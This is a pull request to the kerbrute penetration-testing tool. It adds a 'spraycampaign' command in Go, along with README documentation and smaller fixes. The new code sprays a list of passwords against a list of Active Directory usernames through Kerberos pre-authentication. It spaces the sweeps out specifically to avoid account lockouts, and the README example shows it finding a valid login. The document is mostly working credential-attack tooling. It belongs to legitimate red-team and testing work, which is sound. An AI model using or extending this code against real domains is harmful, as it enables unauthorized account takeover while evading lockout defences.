### PR TITLE
Added command: spraycampaign

### DIFF
--- a/README.md
+++ b/README.md
@@ -116,6 +116,35 @@ Version: dev (43f9ca1) - 03/06/19 - Ronnie Flathers @ropnop
 2019/03/06 21:37:37 >  Done! Tested 2755 logins (2 successes) in 7.674 seconds
 ```
 
+### Spray Campaign  
+With `spraycampaign`, Kerbrute will perform an attack similar to the
+`passwordspray` command, however a list of passwords can be provided. A specified
+number of passwords from the provided list will be sprayed against all users
+in the provided user wordlist every X minutes, as specified.  
+Added by [@deadjakk](https://github.com/deadjakk)
+```
+root@kali:~# ./kerbrute spraycampaign -d sprawl.local users.txt pass.txt 1 2
+
+    __             __               __
+   / /_____  _____/ /_  _______  __/ /____
+  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
+ / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
+/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/
+
+Version: dev (n/a) - 05/31/21 - Ronnie Flathers @ropnop
+
+2021/05/31 14:48:21 >  Using KDC(s):
+2021/05/31 14:48:21 >  	DC0.sprawl.local:88
+
+2021/05/31 14:48:21 >  Spraying password: Password3
+2021/05/31 14:48:21 >  Spraying password: Password2
+2021/05/31 14:48:21 >  Sleeping for 1 minutes until next sweep
+
+2021/05/31 14:49:21 >  Spraying password: Password1
+2021/05/31 14:49:21 >  [+] VALID LOGIN:	 user1@sprawl.local:Password1
+2021/05/31 14:49:21 >  Done! Tested 12 logins (1 successes) in 60.073 seconds
+```
+
 ### Brute User
 This is a traditional bruteforce account against a username. Only run this if you are sure there is no lockout policy! This will generate both event IDs [4768 - A Kerberos authentication ticket (TGT) was requested](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4768) and [4771 - Kerberos pre-authentication failed](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4771)
 

--- a/cmd/spraycampaign.go
+++ b/cmd/spraycampaign.go
@@ -27,7 +27,7 @@ var sprayCampaignCmd = &cobra.Command{
     Succesful logins will be displayed on stdout.
     Consider adding an additional minute or more to the domain password policy to prevent lockouts.
     WARNING: use with caution - failed Kerberos pre-auth can cause account lockouts.
-    Added by @deadjakk
+    Added by deadjakk@shell.rip
     `,
 	Args:   cobra.MinimumNArgs(4),
 	PreRun: setupSession,

--- a/cmd/spraycampaign.go
+++ b/cmd/spraycampaign.go
@@ -26,7 +26,9 @@ var sprayCampaignCmd = &cobra.Command{
     A full domain is required. This domain will be capitalized and used as the Kerberos realm when attempting the bruteforce.
     Succesful logins will be displayed on stdout.
     Consider adding an additional minute or more to the domain password policy to prevent lockouts.
-    WARNING: use with caution - failed Kerberos pre-auth can cause account lockouts`,
+    WARNING: use with caution - failed Kerberos pre-auth can cause account lockouts.
+    Added by @deadjakk
+    `,
 	Args:   cobra.MinimumNArgs(4),
 	PreRun: setupSession,
 	Run:    sprayCampaign,

--- a/cmd/spraycampaign.go
+++ b/cmd/spraycampaign.go
@@ -1,0 +1,143 @@
+package cmd
+
+import (
+	"bufio"
+	"os"
+	"sync"
+	"sync/atomic"
+	"time"
+    "strconv"
+
+	"github.com/ropnop/kerbrute/util"
+
+	"github.com/spf13/cobra"
+)
+
+var sprayCampaignCmd = &cobra.Command{
+	Use:   "spraycampaign [flags] <username_wordlist> <passwordfile> <time in millis between sweeps> <number of passwords per sweep>",
+	Short: "Test X passwords from a provided list of passwords every X millisseconds against a list of usernames",
+	Long: `Will perform a password spray attack against a list of users, iterating through a list of provided passwords. This is much like the passwordspray
+    command, however it allows for a specified delay between every X number of passwords at a time. This is Intended to allow for automated password spraying
+    campaigns to take place without fear of locking out accounts..
+    Like passwordspray this is using Kerberos Pre-Authentication by requesting a TGT from the KDC.
+If no domain controller is specified, the tool will attempt to look one up via DNS SRV records.
+A full domain is required. This domain will be capitalized and used as the Kerberos realm when attempting the bruteforce.
+Succesful logins will be displayed on stdout.
+WARNING: use with caution - failed Kerberos pre-auth can cause account lockouts`,
+	Args:   cobra.MinimumNArgs(1),
+	PreRun: setupSession,
+	Run:    sprayCampaign,
+}
+
+func init() {
+	sprayCampaignCmd.Flags().BoolVar(&userAsPass, "user-as-pass", false, "Spray every account with the username as the password")
+	rootCmd.AddCommand(sprayCampaignCmd)
+
+}
+
+func sprayCampaign(cmd *cobra.Command, args []string) {
+    if len(args) != 4 {
+        logger.Log.Error("You must specify a passfile containing passwords as well as the time between sweeps in millis and then the number of passwords per sweep")
+        os.Exit(1)
+    }
+	usernamelist  := args[0]
+    passwordfile  := args[1]
+	campaigndelay := args[2]
+	maxpersweep   := args[3]
+
+    maxPerSweep,err := strconv.Atoi(maxpersweep)
+    if err!=nil {
+        logger.Log.Error(err.Error())
+        return
+    }
+
+    campaignDelay,err := strconv.Atoi(campaigndelay)
+    if err!=nil {
+        logger.Log.Error(err.Error())
+        return
+    }
+
+	stopOnSuccess = false
+
+	credChan :=  make(chan [2]string, threads)
+	defer cancel()
+
+	var wg sync.WaitGroup
+	wg.Add(threads)
+
+	var scanner *bufio.Scanner
+	if usernamelist != "-" {
+		file, err := os.Open(usernamelist)
+		if err != nil {
+			logger.Log.Error(err.Error())
+			return
+		}
+		defer file.Close()
+		scanner = bufio.NewScanner(file)
+	} else {
+		scanner = bufio.NewScanner(os.Stdin)
+	}
+
+	for i := 0; i < threads; i++ {
+		go makeSprayWorkerCampaign(ctx, credChan, &wg, userAsPass)
+	}
+
+	start := time.Now()
+
+    // read passwords 
+    var passwords []string
+    var password_scanner *bufio.Scanner
+    passfile, err := os.Open(passwordfile)
+
+    if err != nil {
+        logger.Log.Error(err.Error())
+        return
+    }
+    defer passfile.Close()
+
+    password_scanner = bufio.NewScanner(passfile)
+
+    for password_scanner.Scan() {
+        passwordline := password_scanner.Text()
+        passwords=append(passwords,passwordline)
+    }
+
+    // read the usernames
+    var usernames []string
+	for scanner.Scan() {
+        usernameline := scanner.Text()
+        username, err := util.FormatUsername(usernameline)
+        if err != nil {
+            logger.Log.Debugf("[!] %q - %v", usernameline, err.Error())
+            continue
+        }
+        usernames=append(usernames,username)
+	}
+
+    triedThisSweep := 0
+    for _,password := range passwords {
+        println("testing password:",password)
+        for _,username := range usernames {
+            cred := [2]string{username,password}
+            credChan <- cred
+            time.Sleep(time.Duration(delay) * time.Millisecond)
+        }
+        triedThisSweep++
+        if triedThisSweep >= maxPerSweep {
+            triedThisSweep = 0
+            println("sleeping until next sweep...")
+            time.Sleep(time.Duration(campaignDelay) * time.Millisecond)
+        }
+    }
+
+	close(credChan)
+	wg.Wait()
+
+	finalCount := atomic.LoadInt32(&counter)
+	finalSuccess := atomic.LoadInt32(&successes)
+	logger.Log.Infof("Done! Tested %d logins (%d successes) in %.3f seconds", finalCount, finalSuccess, time.Since(start).Seconds())
+
+	if err := scanner.Err(); err != nil {
+		logger.Log.Error(err.Error())
+	}
+}

--- a/cmd/worker.go
+++ b/cmd/worker.go
@@ -32,11 +32,11 @@ func makeSprayWorkerCampaign(ctx context.Context, cred_set <-chan [2]string, wg 
 		select {
 		case <-ctx.Done():
 			break
-        case username, ok := <-cred_set:
+        case cred, ok := <-cred_set:
             if !ok {
                 return
             }
-            testLogin(ctx, username[0], username[1])
+            testLogin(ctx, cred[0], cred[1])
         }
     }
 }

--- a/session/errors.go
+++ b/session/errors.go
@@ -23,6 +23,9 @@ func (k KerbruteSession) HandleKerbError(err error) (bool, string) {
 	if strings.Contains(eString, "KDC_ERR_WRONG_REALM") {
 		return false, "KDC ERROR - Wrong Realm. Try adjusting the domain? Aborting..."
 	}
+	if strings.Contains(eString, "KDC_ERR_ETYPE_NOSUPP") {
+		return true, "KDC ERROR - KDC Encryption Type Not Supported"
+	}
 	if strings.Contains(eString, "KDC_ERR_C_PRINCIPAL_UNKNOWN") {
 		return true, "User does not exist"
 	}

--- a/util/file.go
+++ b/util/file.go
@@ -1,0 +1,76 @@
+package util
+
+import (
+	"os"
+	"bufio"
+)
+
+
+// reads passwords from file and adds them to the current array if
+// they are not in the tried array
+func GetPasswords(passwordfile string, current []string, tried []string, verbose bool, logger *Logger) (array []string, err error) {
+    // read passwords 
+    var password_scanner *bufio.Scanner
+
+    passfile, err := os.Open(passwordfile)
+    if err != nil {
+        return []string{}, err
+    }
+    defer passfile.Close()
+
+    password_scanner = bufio.NewScanner(passfile)
+    for password_scanner.Scan() {
+        passwordline := password_scanner.Text()
+        if !is_present(current,passwordline) && !is_present(tried,passwordline) {
+            current=append(current,passwordline)
+            if verbose {
+                logger.Log.Infof("[*] %s loaded\n",passwordline)
+            }
+        }
+    }
+    return current,nil
+}
+
+func is_present(arr []string, val string) bool {
+  for _, item := range arr {
+    if item == val {
+      return true
+    }
+  }
+  return false
+}
+
+//type Logger struct {
+	//Log *logging.Logger
+//}
+
+//func NewLogger(verbose bool, logFileName string) Logger {
+	//log := logging.MustGetLogger("kerbrute")
+	//format := logging.MustStringFormatter(
+		//`%{color}%{time:2006/01/02 15:04:05} >  %{message}%{color:reset}`,
+	//)
+	//formatNoColor := logging.MustStringFormatter(
+		//`%{time:2006/01/02 15:04:05} >  %{message}`,
+	//)
+	//backend := logging.NewLogBackend(os.Stdout, "", 0)
+	//backendFormatter := logging.NewBackendFormatter(backend, format)
+
+	//if logFileName != "" {
+		//outputFile, err := os.Create(logFileName)
+		//if err != nil {
+			//panic(err)
+		//}
+		//fileBackend := logging.NewLogBackend(outputFile, "", 0)
+		//fileFormatter := logging.NewBackendFormatter(fileBackend, formatNoColor)
+		//logging.SetBackend(backendFormatter, fileFormatter)
+	//} else {
+		//logging.SetBackend(backendFormatter)
+	//}
+
+	//if verbose {
+		//logging.SetLevel(logging.DEBUG, "")
+	//} else {
+		//logging.SetLevel(logging.INFO, "")
+	//}
+	//return Logger{log}
+//}

--- a/util/file.go
+++ b/util/file.go
@@ -39,38 +39,3 @@ func is_present(arr []string, val string) bool {
   }
   return false
 }
-
-//type Logger struct {
-	//Log *logging.Logger
-//}
-
-//func NewLogger(verbose bool, logFileName string) Logger {
-	//log := logging.MustGetLogger("kerbrute")
-	//format := logging.MustStringFormatter(
-		//`%{color}%{time:2006/01/02 15:04:05} >  %{message}%{color:reset}`,
-	//)
-	//formatNoColor := logging.MustStringFormatter(
-		//`%{time:2006/01/02 15:04:05} >  %{message}`,
-	//)
-	//backend := logging.NewLogBackend(os.Stdout, "", 0)
-	//backendFormatter := logging.NewBackendFormatter(backend, format)
-
-	//if logFileName != "" {
-		//outputFile, err := os.Create(logFileName)
-		//if err != nil {
-			//panic(err)
-		//}
-		//fileBackend := logging.NewLogBackend(outputFile, "", 0)
-		//fileFormatter := logging.NewBackendFormatter(fileBackend, formatNoColor)
-		//logging.SetBackend(backendFormatter, fileFormatter)
-	//} else {
-		//logging.SetBackend(backendFormatter)
-	//}
-
-	//if verbose {
-		//logging.SetLevel(logging.DEBUG, "")
-	//} else {
-		//logging.SetLevel(logging.INFO, "")
-	//}
-	//return Logger{log}
-//}


### PR DESCRIPTION
Added a desired function to spread out/automate the passwordspray functionality of kerbrute. The new command will allow a user to provide a list of passwords as well as specify how long to wait between sprays and how many passwords per spray.

This usually ends up being a terminal script of some kind but placing this all in the binary itself allows for cleaner usage, output with timestamps, and platform independence of this functionality. 
![screenshot of the command being run with verbose output](https://user-images.githubusercontent.com/30613497/120239751-9affd200-c224-11eb-97d3-e0482cae4221.png)
